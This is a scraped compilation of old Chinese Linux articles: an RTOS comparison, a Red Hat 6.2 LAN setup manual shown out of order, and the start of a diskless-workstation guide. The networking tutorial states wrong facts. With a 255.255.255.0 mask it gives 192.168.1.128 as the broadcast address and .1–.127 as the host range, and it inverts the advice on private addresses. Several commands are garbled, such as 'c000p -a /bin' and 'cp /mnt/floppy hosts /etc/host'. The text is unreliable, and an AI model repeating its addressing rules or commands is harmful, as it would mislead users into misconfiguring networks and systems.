----KURT－Linux 可运行在两种状态之下：通常状态和实时状态。在通常状态下，所有进程都可以运行，但某些核心服务将带来中断屏蔽的不可预期性。实时模式只允许实时进程运行。

＊ 支持FIFO调度策略、轮转调度策略和UNIX分时调度策略；

＊ 增加了SCHED－KURT调度策略，这是一种静态调度策略，使用一个特殊的调度文件记录预先定义好的待调度进程的参数。

----从以上简略描述可以看出，前三种调度策略实现较规范，特别是两种商业RTOS，遵循或部分遵循POSIX.1b实时调度标准。

----操作系统服务比较

----QNX的系统服务：

＊ 多种资源管理器，包括各种文件系统和设备管理，支持多个文件系统同时运行，包括提供完全POSIX.1及UNIX语法的POSIX文件系统，支持多种闪存设备的嵌入式文件系统，支持对多种文件服务器(如Windows NT/95、LAN Manager等)的透明访问的SMB文件系统、DOS文件系统、CD－ROM文件系统等。

＊ 设备管理。在进程和终端设备间提供大吞吐量、低开销接口服务。

＊ 图形／窗口支持。包括QNX Windows、X Window System for QNX、对MS Windows NT/95和X Window系统的远程图形连接。

＊ TCP/IP for QNX。

＊ 高性能、容错型QNX网络——FLEET，使得所有连入网络的计算机变成一个逻辑上的超级计算机。

＊ 透明的分布式处理。FLEET网络处理与消息传递和进程管理原语的集成，将本地和网络IPC统一起来，使得网络对IPC而言是透明的。

----LynxOS的系统服务：

＊ 网络和通信。由于使用UNIX/POSIX API，Lynx很适合于数据通信和Internet应用。又由于系统的开放性，网络软件很容易移植到Lynx上。同样，Lynx亦提供关键的电话通信协议，使之适用于电信系统的基础架构、操作和多媒体应用。

＊ TCP/IP协议栈。Lynx自带优化的TCP/IP协议栈，提供高性能服务，如TCP头预测、高级路由算法、IP级多址广播和链路级高速缓冲。

＊ Internet工具。包括，Telnet、Ftp、tftp、PPP、SLIP、实时调度的嵌入式Java虚拟机、嵌入式HTTP server、bootp、ARP/RARP、DNS域名服务、电子邮件、Perl、电话通信协议等。

＊ SVR3流。LynxOS流机制为开发和移植基于流的驱动程序和应用提供了核心支持。

＊ 文件系统。实时的类UNIX层次结构文件系统：连续结构文件、带缓冲／不带缓冲、原始分区和原始设备访问。

＊ 基于Motif的图形用户接口。

＊ 分布式计算资源。SCMP与VME总线上的多处理结合，PCI桥服务、CompactPCI Hot－swap Services、Lynx/HA－DDS分布式数据系统。

----Linux的系统服务：

----近来，很多基于Linux的实时应用被开发出来，它具有成熟和丰富的资源。

＊ UNIX用户的开发工具和应用软件都被移植到Linux上。

＊ TCP/IP网络协议。

＊ 各种Internet客户/服务端软件。

＊ X Window。

＊ C/C＋＋、Java等语言编译器。

----上述系统的共同点是都提供了图形界面、各种网络支持等必要工具。QNX是一个更加符合传统“分布式”概念的操作系统，目标是把整个局域网变成一个大的超级计算机，使得网络的存在对用户透明，文件系统提供的服务也很丰富。但是，分布式的程度越高也意味着系统开销的增大。LynxOS则着意于提供丰富的网络服务，而Linux的最大优势则是经济，还可以通过新闻组或mailing list快速地解决用户碰到的任何问题。

----系统开放性对比

----对于很多大、中型系统来说，大多数软件都是为UNIX平台编写的，因此RTOS是否提供POSIX/UNIX API就显得很重要。

----QNX的开放性：

＊ QNX的POSIX兼容性和其提供的UNIX特色的编译器、调试器、X Window和TCP/IP都是UNIX程序员所熟悉的。

＊ 支持多种CPU：AMD ElanSC300/310/400/410、Am386 DE/SE、Cyrix MediaGX、x86处理器(386以上)、Pentium系列、STMicroelectronics 的STPC。

＊ 多种总线：CompactPCI、EISA、ISA 、MPE (RadiSys)、STD、STD 32、PC/104、PC/104－Plus、PCI、PCMCIA、VESA、VME。

＊ 各种外设：多种SCSI设备、IDE/EIDE驱动器、10M/100M以太网卡、Token Ring网卡、FDDI接口卡、多种PCMCIA设备、闪存、声卡等等。

----LynxOS的开放性：

＊ POSIX.1a、1b、1c及BSD4.4等兼容性，使得遵循POSIX 1003或用于UNIX的程序很容易移植到LynxOS上。

＊ 支持多种CPU主板：包括CompactPCI(6U/3U)和标准PCI、VME/Eurobus、PC/104和PC/AT硬件等。

＊ 各种外设适配器：10/100BaseT Ethernet、SCSI接口、单／多通道串行控制器、单／双工并行口、时钟、计时器、IDE接口、高分辨率显示适配器等。

----Linux的开放性：

＊ 用户可得到UNIX的全部开发工具。

＊ 可使用市场上便宜又常见的硬件。

----通过分析，可以看到以上系统各有优势，因此，在平台搭造过程中，用户应根据自己的实际需要并结合性能价格比进行选择。

返回


Red Hat组建局域网完全手册（上）

《一键清理系统垃圾》

Red Hat组建局域网完全手册（上）

     本文将介绍如何组建含有 Red Hat Linux 6.2 计算机的本地局域网（Local Area Network，LAN)。首先阐述一些基础知识，其中包括 TCP/IP (Transmission Control Protocol/Internet protocol 互联网传输控制协议）的概述，以及局域网中 IP 地址的分配。其次介绍局域网的硬件，以及如何在 Red Hat Linux 操作系统上使用 LinuxConf 进行局域网配置。最后，本文将引导你对局域网进行测试和故障排除。
    Linux 在计算机网络通讯领域的应用越来越普遍。由于在各个 FTP 或 HTTP 站点上能够下载到所有源码，获得 Linux 操作系统是相对简单而便宜的。LAN 是一种能连接多种设备的通讯网络，并为这些设备提供互相通讯的方法。通常局域网的规模都比较小，只局限于一幢楼里或相邻的几幢楼。在局域网中并不需要 modem （调制解调器）和电话线，而是通过网线相连。计算机之间的距离必须足够近才能够保证网线正常工作。
    局域网中的每台计算机都需要一个网卡（network interface card, NIC）来接入网线，并且需要分配唯一的主机名和 IP 地址（分配方法将在本文后部分阐述）。因此在分配之前必须掌握关于 TCP/IP 协议的基础知识。
TCP/IP 介绍
    TCP/IP 是互联网和大多数局域网所采用的一组协议。在 TCP/IP 协议中，连接到网络上的每个主机（计算机或其它通讯设备）都有一个唯一的 IP 地址。IP 地址由四个字节（每个字节的取值范围为 0 到 255）组成，字节之间用小数点隔开。通过这样的 IP 地址，就可以区分局域网上的主机。例如一个主机名为 Morpheus 的计算机的 IP 地址可以是 192.168.7.127。为了不将同一 IP 地址分配给多个主机，应当注意避免使用那些为局域网保留的 IP 地址。保留 IP 地址通常以 192.168. 开头。
局域网的网络地址
    在局域网上的所有计算机，其IP 地址的前三个字节都应该是相同的。比如说，若有一个包括 128 台主机的局域网，这些主机的 IP 地址就可以从 192.168.1.x 开始分配，其中 x 表示1到128中任意一个数字。可以用类似的方法，为同一公司内另外 128 台计算机组建一个相邻的局域网。当然在一个局域网中并不是仅能包含 128 台计算机，你还可以组建更大的局域网络。
    网络 IP 地址被分为若干类，这些类型决定一个局域网的规模以及它可以拥有的 IP 地址个数。比如说，A 类的局域网的 IP 地址超过 16,000,000 个，而 B 类局域网所拥有的 IP 地址数大约只有 65,000 个。局域网的规模大小取决于保留地址范围、以及子网掩码（在文章后面有详细解释）。（参看表1）
    表 1. 地址范围与局域网规模

地址范围
子网掩码
提供
局域网的规模

10.0.0.0 - 10.255.255.255
255.0.0.0
1 A 类网
16,777,216

172.16.0.0 - 172.31.255.255
255.255.0.0
16 B 类网
65,536

192.168.0.0 - 192.168.255.255
255.255.255.0
256 C 类网
256

网络地址和广播地址
    组建局域网时还要注意，IP 地址范围的两个边界地址被保留为该局域网的网络地址和广播地址。应用程序可以使用网络地址来表示整个本地网络。而广播地址则可用来将同样的消息同时发送给网络上所有主机。
    例如要使用的地址范围为 192.168.1.0 到 192.168.1.128，则第一个 IP 地址（192.168.1.0）被保留为网络地址，而最后一个地址（192.168.1.128）被保留成广播地址。因此，给这个局域网上的计算机分配 IP 地址时，只能在 192.168.1.1 到 192.168.1.127 之间选择：
    网络地址: 192.168.1.0
    主机地址范围: 192.168.1.1 到 192.168.1.127
    广播地址: 192.168.1.128
子网掩码
    局域网上的每个主机都有一个子网掩码。子网掩码由四个字节组成，它的值为 255 时表示 IP 地址中网络地址的部分，值为 0 时则识别 IP 地址中表示主机号的部分。比如说，子网掩码 255.255.255.0 可以用来决定主机所处的局域网。子网掩码最后的 0 则决定该主机在局域网中的位置。
域名
    域名（或称为网络名）由唯一的名字和标准互联网后缀组成，这些后缀包括 .com，.org，.mil，.net 等。只要你的局域网有一个简单的拨号连接，并且不直接为其他的主机提供某些类型的服务，就可以随意给它命名。这个例子里组建的网络被认为是秘密私有的，因为它使用了在 192.168.1.x 范围内的 IP 地址。因此执行了上述操作之后，从互联网上依然无法根据所选择的域名与主机连接。你还需要一个“官方”正式域名才能达到此目的。为了获得正式域名，你可以到 InterNIC，Network Solutions 或 Register.com 上登记。在本文末尾的资料部分列举了一些站点，可以找到获得官方域名的具体方法。
主机名
    组建局域网时的另一个重要步骤，是为局域网上所有的计算机分配主机名。为了识别局域网中的主机，主机名必须是唯一的。同时，主机名也不能包含空格或标点符号。例如 Morpheus、Trinity、Tank、Oracle 以及 Dozer 这五个名字都是合法的主机名，你可以将它们分配给局域网上的五个主机。此外选择主机名时还有一些技巧：例如简短的主机名能够减少打字量、容易记忆的名字便于日后通讯等。
    表 2 对上述内容做了概括。局域网上所有的主机都应当拥有同样的网络地址、广播地址、子网掩码和域名，因为这些地址标志出一个局域网的全部内容。局域网上所有的计算机都拥有一个主机名和 IP 地址作为识别它们的唯一标志。若某个局域网的网络地址是 192.168.1.0，广播地址 192.168.1.128。则其他主机的 IP 地址就在 192.168.1.1 和 192.168.1.127 之间。
    表 2. 拥有少于 127 台主机的局域网的 IP 地址分配 IP 地址
例子
同/异

网络地址
192.168.1.0
所有主机都相同

域名
www.yourcompanyname.com
所有主机都相同

广播地址
192.168.1.128
所有主机都相同

子网掩码
255.255.255.0
所有主机都相同

主机名
任意合法的名字
每个主机都不同

主机地址
192.168.1.x
每个主机都不同

分配 IP 地址

    在局域网中分配 IP 地址的方法有两种。你可以为局域网上所有主机都手工分配一个静态 IP 地址；也可以使用一个特殊服务器来动态分配，即当一个主机登录到网络上时，服务器就自动为该主机分配一个动态 IP 地址。
静态 IP 地址分配
    静态 IP 地址分配意味着为局域网上的每台计算机都手工分配唯一的 IP 地址。同一局域网中所有主机 IP 地址的前三个字节都相同，但最后一个字节却是唯一的。并且，每个计算机都必须分配一个唯一的主机名。局域网上的每个主机将拥有同样的网络地址（192.168.1.0），广播地址（192.168.1.128），子网掩码（255.255.255.0）和域名（yourcompanyname.com）。最好在分配时，记录下局域网上所有主机的主机名和 IP 地址，以便日后扩展网络时参考。
动态 IP 地址分配
    IP 地址的动态分配是通过一个叫做 DHCP (Dynamic Host Configuration Program 动态主机配置程序）的服务器或主机来完成的，当计算机登录到局域网上时，DHCP 服务器就会自动为它分配一个唯一的 IP 地址。名为 BootP 的程序也能够提供类似的动态分配服务。DHCP/BootP 服务可以是程序或设备，但必须在拥有唯一 IP 地址的主机上运行。路由器可以看作一个 DHCP 设备的例子，它的一端充当以太网集线器（Ethernet hub，一种允许多个主机通过以太网插口和指定端口连接的通讯设备），另一端则可以连接到互联网上。另外，DHCP 服务器也需要分配网络和广播地址。在动态分配 IP 地址的网络系统里，不需要手工分配主机名和域名。

返回


Red Hat组建局域网完全手册（下）

《一键清理系统垃圾》

Red Hat组建局域网完全手册（下）

局域网的测试与故障排除

测试局域网
    测试局域网的第一步是，确认局域网中的计算机在启动之后能否与其他主机通讯。可以先在每台计算机上输入 reboot 命令。在 Linux 重新启动过程中，要仔细观看屏幕上滚动的测试信息。注意寻找下列信息：

    Setting hostname: <hostname you assigned to this computer>

    Bringing up Interface lo: <OK> or <FAILED>

    Bringing up interface eth0 <OK> or <FAILED>

    Setting hostname 这一项将显示你分配给这台计算机的主机名。而 lo 和 eth0 项的后面若显示 [OK]，就表示检测成功。

    可以使用 ping 命令来判断计算机能否与其他计算机通讯。在当前主机上打开一个终端窗口，并输入命令 ping <IP address> 或 ping <hostname>。其中，<IP address> 或 <hostname> 是你分配给这个计算机的 IP 地址和主机名。需要注意的是，为了让 ping 命令正确工作，就必须输入 IP 地址或者主机名作为参数。

    如果你已经正确配置了 DNS nameserver 规范，那么 ping <hostname> 命令就会将 hostname 这个主机名映射成相应的 IP 地址。否则，只好在 ping 命令后面给出确切 IP 地址来测试，也就意味着现在你要拥有该局域网上所有计算机的 IP 地址列表。ping 命令通过局域网将消息发送到目的 IP 地址所表示的计算机。如果这台计算机能够与其他主机”交谈“或通讯，就可以看到一些消息或包（包括信息的字节数）。这些包应该象下面这样：

    64 bytes from 192.168.1.x : icmp_seq=0 ttl=255 time=0.8ms

    64 bytes from 192.168.1.x : icmp_seq=0 ttl=255 time=0.8ms

    64 bytes from 192.168.1.x : icmp_seq=0 ttl=255 time=0.8ms

    注意到 ”192.168.1" 代表的是该主机所属于的网络，而 x 则表示试图要 ping 的主机号码（例如 Oracle），这两部分组成了一个完整的 IP 地址。ping 命令不会自动停止，你可以按 Ctrl+C 来终止它，就可以看到这次 ping 测试的基本信息：

    --- hostname.yourcompanyname.com ping statistics ---

    4 packets transmitted, 4 packets received, 0% packet loss

    round-trip min/avg/max = 0.3/0.4/0.8 ms

    如果 packet loss 信息为 0%，就表示测试成功了。但倘若 ping 命令的结果看起来象下面这样，局域网可能还存在一些问题：

    From hostname.comanyname.com (192.168.1.1): Destination Host Unreachable

    这意味着两个计算机根本不能够通讯。出现不能通讯的情况时，可以参考下一部分的局域网故障排除。否则，若能成功地 ping 到局域网中其他所有机器，就说明局域网的基本通讯功能是完好的。此时局域网已基本组建好，你可以随心所欲地安装其他网络设备。

局域网故障排除
    如果你不能够 ping 到局域网中的另外一台主机，可以按照下面的方法寻找问题的根源。首先，用 halt 命令关掉局域网上所有的计算机。在所有计算机的命令行上输入 halt。关掉所有计算机的目的在于，可以在再启动这些计算机的时候观察到启动程序的反馈信息。

    检查所有计算机之间的网线，确信所有的 RJ45 接口都被正确连接。在确保所有网线正确安全连接之后，逐个启动局域网上的计算机，并观察启动过程中的下列响应信息：

    Setting hostname: hostname.networkname [OK]

    Red Hat Linux 的启动过程中，你可以在 LILO 启动提示符后面输入 I ，进入交互的启动模式，从而更清楚地查看反馈信息。首先检查分配给这台计算机的主机名和网络名是否拼写正确。如果不属于拼写错误的情况，就需要回到 LinuxConf 的 Basic Host Information 部分。在交互模式下，你会被提示是否启动若干服务。对于这些提示问题都回答 Yes，并集中注意力观察不同测试的结果。如果 Kudzu 程序检测到一块网卡，这就意味着在前面过程中没有正确配置这块网卡。继续运行 Kudzu 来配置这块网卡。当你被提示是否要配置网络时，选择 "Yes" 并为这台计算机输入正确的 IP 地址和其他相关信息。

    另一个需要仔细检查的重要内容为：

    Bringing up interface eth0 [OK]

    这一行显示网卡是否正确工作。如果这个测试失败，你就需要用 LinuxDonf 来检查所有网络设置，从而确保网卡被正确配置。如果网络设置是正确的，则可能网卡本身有问题。为了验证这一点，可以咨询网卡的生产商或一个计算机专家，来判断该网卡是否有缺陷。如果是网卡问题，则可以安装新网卡并重复先前的故障排除过程。

结论
    即使用户几乎没有关于局域网的背景知识，只要仔细理解并执行了上述的步骤，用 Red Hat Linux 系统来组建局域网是一件相对简单直接的过程。

返回


Red Hat组建局域网完全手册（中）

《一键清理系统垃圾》

Red Hat组建局域网完全手册（中）

局域网的安装与配置
局域网中的硬件
    如果缺少将计算机连接到一起的硬件，分配主机名和 IP 地址也就毫无用处。目前有若干种不同类型的网络硬件体系，比如以太网（Ethernet）、令牌环（Token Ring）、光纤分布式数据接口（FDDI）、令牌总线（Token Bus）等。由于以太网是应用最广泛的硬件体系，这里将主要介绍它所需要的硬件。你需要下列硬件：为每台计算机准备一块以太网卡（Ethernet Network Interface Card，NIC），一个端口数至少和待连接计算机一样多的以太网兼容集线器，以及将网卡与集线器相连的网线（或 10BaseT 的电缆）。

    选择硬件时还要注意确认它们与 Red Hat Linux 操作系统兼容。关于这些硬/软件兼容性的信息通常可以在产品包装盒上的 Requirements （要求）部分找到。当然，你也可以直接向出售计算机的人询问硬/软件要求。

    在选择以太网集线器的时候，必须确认它的端口数至少应和局域网内计算机数目相等。为了便于日后扩展局域网，最好选择端口有盈余的集线器。

    如果你计划让局域网中所有的计算机通过本地 ISP（Internet Service Provider，互联网提供商）连入互联网，那么路由器与以太网的结合是最理想的选择。局域网上的任何一台计算机，只要配置好路由器/以太网信息便可。假设局域网上所有的计算机都运行 Red Hat Linux 操作系统，可以使用 LinuxConf 之类的 Linux 工具来配置路由器。

    最后，选择网线要考虑可扩展性。通常情况下以太网使用 10BaseT 电缆，并在它的两端接上 RJ45 接口。购买网线时最好选择比需要长度多 1 或 2 倍，这样可以应付将来局域网拓扑结构（topology structure）的改变。

安装硬件
    假如已将上面这些硬件准备完毕，下一步就是安装这些硬件。首先关掉所有将要连到局域网上的计算机。然后拆开这些计算机，遵照生产商的说明书在主板的正确插槽上插入网卡。

    为以太网集线器找一个方便但安全的地方，最好是局域网所在建筑物的中心位置或是放置着所有待连接计算机的房间。然后用网线将每台计算机的网卡接到以太网集线器上，确保所有网线避开那些人们会时常经过的地方。在启动这些连接到局域网上的计算机之前，再次确认已执行完硬件提供商所说明的安装操作。

    如果你使用路由器或者 DHCP 服务器，来将局域网连接到互联网，就需要根据用户手册的要求进行相应配置。假如现在所有计算机的网卡都已经和集线器某指定端口相连，就可以开始在 Red Hat Linux 操作系统上使用软件进行配置了。

配置局域网
    如何配置局域网上的计算机，取决于 Red Hat 操作系统是在安装局域网硬件之前或是之后安装的。如果先安装局域网硬件，那么安装 Red Hat 系统的时候，安装程序就会提示进行网络配置。如果先安装 Red Hat 操作系统，则名为“Kudzu" 的程序会检测到新安装的以太网卡，并自动启动配置程序。"Kudzu" 配置步骤如下：

    １．当启动程序显示 "Welcome to Kudzu." 对话框时，按 Enter 键便进入配置过程。

    ２．接着，在另外一个对话框中选择所安装网卡的商标名，并按 Enter 键继续。

    ３．一段短暂的延迟之后，你将会看到 "Would You Like to Set up Networking" 的消息。

    ４．用 Tab 键选择 NO 选项，并按 Enter 键，就会跳过具体的网络配置工作。（本文后面将描述进入 Linux 系统后，如何使用 LinuxConf 设置网络。）

    这时启动程序会正常继续，接着用 root 帐号登录到计算机上。（root 帐号在 Red Hat 系统安装的时候创建）

使用 LinuxConf 来配置以太网卡
    可以使用名为 LinuxConf 的应用程序为局域网上的每个计算机配置或重新配置网卡。在 KDE 终端窗口的命令行或 GNOME 桌面环境下输入 linuxconf 就能够启动 LinuxConf 程序。另一个启动该程序的方法则是在主菜单按钮上选择 System，然后再选 LinuxConf。当 LinuxConf 程序启动后，可以根据下列步骤来配置网卡：

    １．在 LinuxConf 的树结构中，选择 Config, Networking, Client Tasks, Basic Host Information。

    ２．在 Host name 域中输入你为此计算机分配的合法完整的主机名。

    ３．然后点击 Adaptor 1，将会显示你的网卡设置。

    ４．检查 Enabled 按钮是否被选中，从而确认网卡被正常连接。

    ５．你可以选择 Manual 选项，并继续执行第 6 步来手工分配 IP 地址。如果该局域网上有 DHCP 或 BootP 服务器，就可以相应地选择 DHCP 或 BootP 选项。局域网将为此计算机动态分配地址，可以直接跳转到第 12 步。

    ６．在 Primary name + domain 选项中，输入此台计算机的主机名以及域名，主机名和域名之间用句点隔开。

    ７．在 Aliases 选项中，可以为这台计算机输入其他的主机别名。若有多个别名，则用空格隔开。

    ８．在 IP Address 域里填入为此台计算机分配的 IP 地址（例如 192.168.1.1）。

    ９．在 Netmask 处输入子网掩码 255.255.255.0。

    １０．在 net device 处，填入 eth0。其中，eth0 表示这台计算机里面的第一块网卡。

    １１．该网卡的 driver 或 Kernel Module 选项会由 LinuxConf 自动填上。

    １２．点击 Accept 按钮来激活所有的变化。

    重复步骤 1-12，为局域网上所有的计算机配置网卡，同时必须核实输入了正确的主机名以及相应 IP 地址。

Nameserver 规范
    组建局域网的另一重要步骤是配置 Nameserver 规范。当计算机的名字给出之后，linux 根据这个规范来查找该计算机的 IP 地址。Red Hat Linux 系统有两种方法来将主机名映射成 IP 地址。一种是通过域名服务器（Domain Name Services，DNS），另一种则是通过 /etc/hosts 文件。/etc 目录是计算机中大部分系统配置文件存放的地方。输入 cd /etc，将当前目录切换到 /etc 就可以找到 hosts 文件。然后可以根据下列步骤来将主机名映射成 IP 地址：

    １．在 LinuxConf 的左栏里，打开 Nameserver specification (DNS)。

    ２．鼠标左键单击 DNS Usage 选项。（这个按钮应该被按下去。）

    ３．在 Serch Domain 1 域旁边输入 localdomain。

    ４．如果你知道缺省或其次 nameserver 的 IP 地址（这些信息可以在网卡上找到），可以在 IP of nameserver 1 和 IP of nameserver 2 域里分别输入相应的地址。否则，你可以不填这两项。

    ５．鼠标左键单击 Accept 按钮，从而激活所有的变化。

Hostname search path
    给出了主机名之后，Red Hat Linux 系统可以利用 hostname search path 来搜索其对应的 IP 地址。根据下列步骤配置 hostname search path，就可以让本地文件 (/etc/hosts) 来查找本地主机名，并让 ISP 域名服务器提供网络域名服务：

    １．在 LinuxConf 的左栏，打开 Routing and Gateways 项。

    ２．选择 Host Name Search path 选项。

    ３．在 LinuxConf 的右栏中，选择 Multiple IPs for One Host 选项。

    ４．在 LinuxConf 的右栏中选择 hosts, dns 选项。

    ５．鼠标左键单击 Accept 按钮来激活所有的变化。

设置 /etc/hosts
    Red Hat Linux 操作系统需要一些方法来根据局域网中每台计算机的主机名来寻找相应 IP 地址。前面曾提到过域名服务器（DNS）是一种将主机名映射到 IP 地址的方法。在 DNS 配置时，主机名和 IP 地址应该已经被添加到一个已存在的 nameserver 上。可以咨询你的本地 ISP 提供商，来获得这些 IP 地址。另一方面，如果小规模局域网中有一个集中的 nameserver，则关于该局域网商每个计算机都有一个配置文件，记录该计算机的主机名，IP 地址和其他的别名。这个配置过程包括编辑 /etc/host 中的一个文本文件。你必须在局域网的每台计算机上，执行下列步骤配置 /etc/hosts 文件：

    １．在 LinuxConf 的左栏，打开 Misc 项。

    ２．打开 Information about hosts 项。你可以看到一个记录着计算机 IP 地址，主机名和其他别名的条目。

    ３．鼠标左键单击 Add 按钮，就可以添加关于局域网上的其他主机信息的条目。

    ４．在出现的对话框中，为待添加的主机输入它的机器名＋域名（例如 trinity.yourcompanyname.com）。

    ５．在 Alias 选项后为该主机输入一个和多个别名（例如 tank）。

    ６．在 IP number 项后面，输入你为这台主机所分配的 IP 地址。

    ７．鼠标左键单击 Accept 按钮来激活上面所做的变化。

    ８．重复步骤 1-7，为局域网上所有的计算机进行配置。

    当你为所有的计算机执行了以上的步骤 1-7 之后，LinuxConf 中的 /etc/hosts 选项卡将列出局域网中所有计算机的信息。其中，本地主机名被显示成 localhost。最后你可以按照下列步骤，保存所做的修改配置并退出 LinuxConf 程序：

    １．确信所有的主机名和 IP 地址都已经输入之后，鼠标左键单击 /etc/host 栏中的 Quit 按钮。

    ２．若用鼠标左键单击 LinuxConf 界面左下角的 Quit 按钮，退出 LinuxConf 程序。

    ３．若用鼠标左键单击 Activate the Changes 按钮则能够保存所做的修改并退出 LinuxConf。

重复为所有主机配置
    现在你已经配置好局域网中的一台计算机，还需要重复从"配置局域网"开始所说的步骤，为所有计算机进行配置。如果希望用一个较节省时间的方法来配置所有计算机，可以直接用拷贝（copy）的方法来覆盖这些计算机上原来的 /etc/hosts 文件。

    你可以将 /etc/hosts 文件拷贝到软盘或光盘（如果你拥有一个光盘刻录机）上，然后再从软盘或光盘上拷贝到待配置计算机的 /etc 目录下。在那台利用 LinuxConf 程序配置好的计算机上执行拷贝命令。只要在命令行上输入 cp /etc/hosts /mnt/floppy，就可以将配置好的 /etc/hosts 文件拷贝到软盘上。

    接着，将软盘插入局域网上其他计算机的软驱中，并在终端窗口上输入 cp /mnt/floppy hosts /etc/host。此命令将 hosts 文件拷贝到局域网上这些计算机的 /etc 目录下。如果你使用光盘进行拷贝，只要将上述命令中的 /mnt/floppy/ 替换成 /mnt/cdrom/便可。正如你所注意到的，/etc/hosts 文件其实是一个文本文件，分三栏列出了域名、主机名和 IP 地址。最后，确认本地计算机和它相应的 IP 地址在这个列表中出现了两次，而局域网上的其他计算机信息只列出一次。

返回


安装 Linux 无盘工作站

《一键清理系统垃圾》

安装 Linux 无盘工作站

说起无盘工作站，大家一定不会陌生，当年Novell下的无盘DOS工作站很是流行，后来又流行过Win95无盘工作站，只是由于问题多多，后来微软自己停止了对无盘Windows的支持。
随着Linux的日益流行，使用Linux的人越来越多，其实Linux 对远程引导的支持非常好，Linnx内核自身又支持网络文件系统，因此非常适合做无盘工作站，本文将以一个实例向大家详细介绍无盘Linux工作站的安装办法。
这个网络是一个小的局域网，有1台服务器和4台 Linux 无盘工作站，彼此之间用双绞线通过HUB连接，服务器的IP地址定为192.168.0.80 ，名字是server ，5台无盘工作站的地址由服务器动态分配，地址范围从 192.168.0.1 到 192.168.0.4 ，名字分别是c1，c2，c3，c4，服务器和无盘工作站使用的都是 NE2000 兼容网卡，无盘工作站使用的网卡上都安
装了BOOTROM 启动芯片，服务器操作系统安装的是 RedHat Linux 6.0 ，安装时选用定制安装，并安装了全部软件。
Linux的远程引导有两种方式，一是利用Bootp协议，有一个专门的项目EtherBoot 提供支持(http://www.slug.org.au/etherboot/)，这种方式引导 Linux 的速度是最快的，但这种方式有一个最大的问题，就是在市场上找不到支持这种远程引导协议的 BOOTROM 启动芯片（除非自己刻录），因为市场上几乎所有的 BOOTROM 启动芯片都是遵循NOVELL远程引导协议的，于是有人提出另外一种方式，就是服务器端用 NetWare 服务器，客户端就可以用现有的BOOTROM 启动芯片了，说到这里大家一定胡涂了，作Linux无盘工作站岂不是还一台NetWare 服务器？不是的，因为神通广大的 Linux 可以模拟 NetWare 服务器，就象Samba可以把 Linux 模拟成 NT 一样，mars_nwe 可以把 Linux 模拟成 NetWare，不仅能提供 NetWare 文件和打印服务，还能提供远程引导支持(知道Linux的厉害了吧)，本文讲述的
Linux 无盘工作站就是用这种方式作远程引导的。

准备启动盘
由于在 Linux 下没有制作符合 NetWare 远程引导协议启动映象的工具，所以只能用早期的Win95()提供的工具(遗憾)。找一台装有 Win95 的机器启动后按 F8 进入纯DOS方式，格式化一张启动盘 format a: /s ，然后将RedHat Linux安装光盘上 dosutils 目录下的loadlin.exe复制到启动盘，在启动盘上作一个 autoexec.bat 文件，代码只有一行
loadlin.exe bzImage root=/dev/nfsroot
从 Windows 95 安装光盘的 Win95 目录下的cab文件中解出 rplboot.sys 文件放在启动盘上，命令如下：
extract.exe /a /l a: win95-27.cab rplboot.sys
一张用来做启动映象的启动盘就作好了，保存好启动盘，以后作启动映象时会用到它。

编译内核
用于无盘工作站的Linux内核与用于从本地硬盘引导的Linux内核是不同的，无盘工作站的内核必须支持NFS作为根文件系统，即远程根文件系统，所以必须编译无盘工作站专用的内核。笔者使用的内核代码版本是2.2.16，将内核源代码解压到/usr/src下，cd /usr/src/linux 进入内核子目录，执行命令make menuconfig 进行内核编译配置，下列项目必须按要求设置：
Processor type and features 该项目下面的选项必须根据无盘工作站的CPU类型设
置，而不是根据服务器的CPU类型设置
Loadable module support 该项目下面的所有选项都禁止，即不支持模块功能
Plug and Play support 设置为有效
Block devices 该项目下面的
Loopback device support
Network block device support
都设置为有效
Networking option 该项目下面的
kernel level autoconfiguration
DHCP support (NEW)
都设置为有效
Network device support 该项目下面的选项必须根据无盘工作站使用的网卡进
行设置，本例中使用的是NE2000兼容网卡，选项
Ethernet (10 or 100Mbit)
Other ISA cards
NE2000/NE1000 support (NEW)
都设置为有效
Filesystems 该项目下面的Network File Systems子项目下面的
NFS filesystem support
Root file system on NFS (NEW)
都设置为有效
其它的选项可以不用理会，直接用缺省值就可以了，当然如果你的无盘工作站有些其它需
要使用的设备，你也可以将有关的选项设为有效，比如，本例中的无盘工作站使用了声霸
卡兼容的声卡，下面的选项
OSS sound modules (NEW)
100% Sound Blaster compatibles (SB16/32/64, ESS, Jazz16) support
FM synthesizer (YM3812/OPL-3) support (NEW)
都设置为有效
以上设置完成后，退出内核编译设置程序，会出现一个对话框
Do you wish to save your new kernel configuration?
回答
然后执行
make dep && make bzImage
进行内核编译，这个过程得花一点时间，特别是如果计算机的速度不快的话，花的时间会
更长一些。编译内核如果没有错误，会得到内核映象文件
/usr/src/linux/arch/i386/boot/bzImage ，
将启动软盘插入计算机，执行下面的命令
mount -t vfat /dev/fd0 /mnt/floopy
cp /usr/src/linux/arch/i386/boot/bzImage /mnt/floppy
umount /dev/fd0
好了，启动盘上的文件都准备齐全了，等会儿用它到Win95环境下制作启动映象。

服务器设置
服务器端需要运行nfsd、dhcpd、mars_new等几个服务进程，这些软件在ReHat Linux发行套件里都有，如果在安装 Linux 的时候选择全部安装，这些软件都会随着安装操作系统而装好了，下面对这些软件进行设置，注意，下面的操作要以 root 身份进行。
1、 NFS 守护进程nfsd
首先要建立几个供无盘工作站使用的目录，并通过nfsd 导出，命令如下:
mkdir /tftpboot
然后编辑文件 /etc/hosts ，加入下面的内容
192.168.0.80 server server.domain
192.168.0.1 c1 c1.domain
192.168.0.2 c2 c2.domain
192.168.0.3 c3 c3.domain
192.168.0.4 c4 c4.domain
第一台工作站的工作目录设置方法如下:
mkdir /tftpboot/192.168.0.1
cd /tftpboot/192.168.0.1
c000p -a /bin .
cp -a /dev .
mknod dev/nd0 b 43 0
chmod 600 dev/nd0
cp -a /etc .
cp -a /home .
cp -a /lib .
rm -rf lib/modules
cp -a /root .
cp -a /sbin .
cp -a /var .
mkdir proc
mkdir usr
mkdir tmp
chmod 777 tmp
touch fastboot
chattr +i fastboot
cd etc
编辑文件 sysconfig/network-scripts/ifcfg-eth0
保留其中的
DEVICE=eth0
ONBOOT=yes
其余的行全部删除，然后增加一行
BOOTPROTO=dhcp
编辑文件 rc.d/rc.sysinit ，在文件最后加上两行
mount -t nfs server:/usr /usr
/usr/X11R6/bin/xfs
编辑文件 fstab
保留其中的
none /proc proc defaults 0 0
其余的行全部删除，然后增加一行
server:/tftpboot/192.168.0.1 / nfs defaults 1 1
其它工作站的工作目录设置方法就简单多了
cd /tftpboot
cp -a 192.168.0.1 192.168.0.2
cp -a 192.168.0.1 192.168.0.3
cp -a 192.168.0.1 192.168.0.4
编辑文件 /etc/exports ，加入以下内容
